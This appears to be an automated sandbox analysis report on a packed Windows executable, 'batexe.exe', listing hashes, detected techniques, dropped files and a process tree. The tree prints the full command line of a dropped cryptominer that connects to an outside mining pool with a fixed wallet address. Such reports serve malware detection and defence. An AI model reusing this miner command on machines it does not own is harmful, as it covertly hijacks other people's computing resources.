73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
300s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
18/02/2024, 07:22

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3120	b2e.exe
4996	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4996	cpuminer-sse2.exe
4996	cpuminer-sse2.exe
4996	cpuminer-sse2.exe
4996	cpuminer-sse2.exe
4996	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3184-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3184 wrote to memory of 3120	3184	batexe.exe	84
PID 3184 wrote to memory of 3120	3184	batexe.exe	84
PID 3184 wrote to memory of 3120	3184	batexe.exe	84
PID 3120 wrote to memory of 1176	3120	b2e.exe	87
PID 3120 wrote to memory of 1176	3120	b2e.exe	87
PID 3120 wrote to memory of 1176	3120	b2e.exe	87
PID 1176 wrote to memory of 4996	1176	cmd.exe	88
PID 1176 wrote to memory of 4996	1176	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3184
- C:\Users\Admin\AppData\Local\Temp\8EE2.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\8EE2.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8EE2.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\96E1.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1176
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4996

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8EE2.tmp\b2e.exe

Filesize
12.4MB

MD5
3c6edc5ac42c9c216c04ab81084ca5a3

SHA1
f721ab4f0680bf4bb133b8d7bf054e5c9587cac8

SHA256
4d66120a98986bf2c7da4b37f7d4060d79e85a18da535b24a83fb7017708a4cc

SHA512
d691b0f7c42be3f5bc27128545ccf6838bf7adf14ca273adc6c557b3ddc4972b847e45ae460ab44e8108211e61d9ef8caf96064893fb74f195bda574d9af14a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\8EE2.tmp\b2e.exe

Filesize
1.2MB

MD5
7b0f4c1d8506067fce25df5de733bcb7

SHA1
053b618c2012c6895e9709696395951acf15c165

SHA256
dd9a3eca69a73709146ebc228a433e0fef43ab6c12c2280725d798c7b494216a

SHA512
45ca44d04c436082073475b0bec73cdd3df1f0cc670d9a3d5dd77fc2b3b60ef870af5912d27269107222850b07234060eefb2d272b96de1367ff544cac506618

Download Submit
C:\Users\Admin\AppData\Local\Temp\8EE2.tmp\b2e.exe

Filesize
1.2MB

MD5
05f6765e8266a1a7d81a80da7788444e

SHA1
e7afd0bf0dce889a026f4233c6705907083e6e23

SHA256
3256219f071d9bbeb2b3483abc7e647cbb550c0b74c415ace444bd8a334df9e8

SHA512
417d266a6eae32d630cf1322d3ab78f8547b09254ba3b5e2e544a7fd294de819754ab2f104ba2f3cab59a1fcfe7b0ea6f622712736079b7eec12a242b914293c

Download Submit
C:\Users\Admin\AppData\Local\Temp\96E1.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1024KB

MD5
1ad6167569badab73bb51c7109b56693

SHA1
85c80eff3810728aeb4af1cdfc6984facaeeb6c0

SHA256
2a0237405f10841de2c9a5d337e1ae7ef626e562194dc6d096d92ae81e88aea6

SHA512
e219d97f0dc3b5f94798dc75f5328b4e7282c420fbb4ed1b44fb1e17941486f244fa28ccd73f55fcaa299a9b2526395a6a81d20a7ff26d9fe02bad77fec68648

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.4MB

MD5
2ef40d5c3b964c66392be6a3db51bf84

SHA1
391a644aa11504129db4b42007b054f2c3bf5414

SHA256
0ef835e2576ba8fbfcd733a66284579607cc8dafdc2b26fe3c0091dc66d8e707

SHA512
0b568c8b5ef88af49c00801cd5eaf3e7262367d2a3356f1a685d36e3c1dff63babb5dd049d5a1e7fbe214cab35e6f271d0a105e073a1fb2c281bb5c0279b7107

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.0MB

MD5
27a85cb1073892137500e1ca70dcac9b

SHA1
bf668a6903e9e4aa788667bc25ce6915c0aea64d

SHA256
3c678ba66463825911f46ee93d112126c7222a1537fa6b7225236c462910a05e

SHA512
be735bae0ddaaaa8788ceaa4197e5e18730122af27261b3d773d91a419ecb54d6041ead79859eefebf1be20c450ef42be3366ff365b3645a5902a77996886098

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
768KB

MD5
fe316f2b417e142dffa0e03efb65e1a4

SHA1
907805b2c3bc0a0791086cb5fc8e3a950bc78e6d

SHA256
aca06866767d9e0bbe1e9bef7efce1152d34243e1acefc5f7ac4f6a245456671

SHA512
8ebfa0700b00c4064d1ded11fc1b4001f01238ee0c4cf88a873e0ccf38c30a574d600649bfdef85f2e3aec5c279a43680f7a66604bc6f27bbda0219e3786774d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
960KB

MD5
f3707fd5b389e53285dfb3815a4785b8

SHA1
788b2ac7be4acb28e804021893e11cdd44ee0784

SHA256
f7ef0e3e60989fac5636e6e5a018b730b403b75889125b56c4d07d6279e94c94

SHA512
f11d8577758db08f597987f525b4fc4c8c3f5181255f89281300968dc90fe4b298c322e3f531f768cd5014d116bb7161365c9d3fbaa76ab835405d8a1e231f26

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
896KB

MD5
4ece07a08273d0d0db84220926c3d32f

SHA1
d90712e2e643311a963676e87f6afad0c421d895

SHA256
d82c02350e5ca5ebe35d4349a16c3c9986aaecd8be71c05a00b1af09039a4cf3

SHA512
fa010b4c3c0e6d38bb281b4541c0e8b124e05d2feaa6dc11cb6e9c1d85145d5885a5cd61c1bca283f2d9f30295b197343311306acc9d5393aef64793067cdcab

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
832KB

MD5
2bfa2b9803bf342837d2cfe9b2b57f64

SHA1
e89eec3559c4904ce523943fed97f3fa2534ab39

SHA256
38710a4ce8976e3e452fe43563f28f9a8259165fd68ca94f5d64f5f4a299b6ab

SHA512
d099f07ca1cb598bdd6f563d917fe3ddcf3f6f37b589f68da987426e416492acf3dbfb2e18387d9afb168308d55c9acfb568c3d31735ab307fc070ff4da93793

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/3120-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3120-63-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3184-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4996-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4996-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4996-46-0x00000000763F0000-0x0000000076488000-memory.dmp

Filesize
608KB

Download
memory/4996-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/4996-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-53-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-58-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4996-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download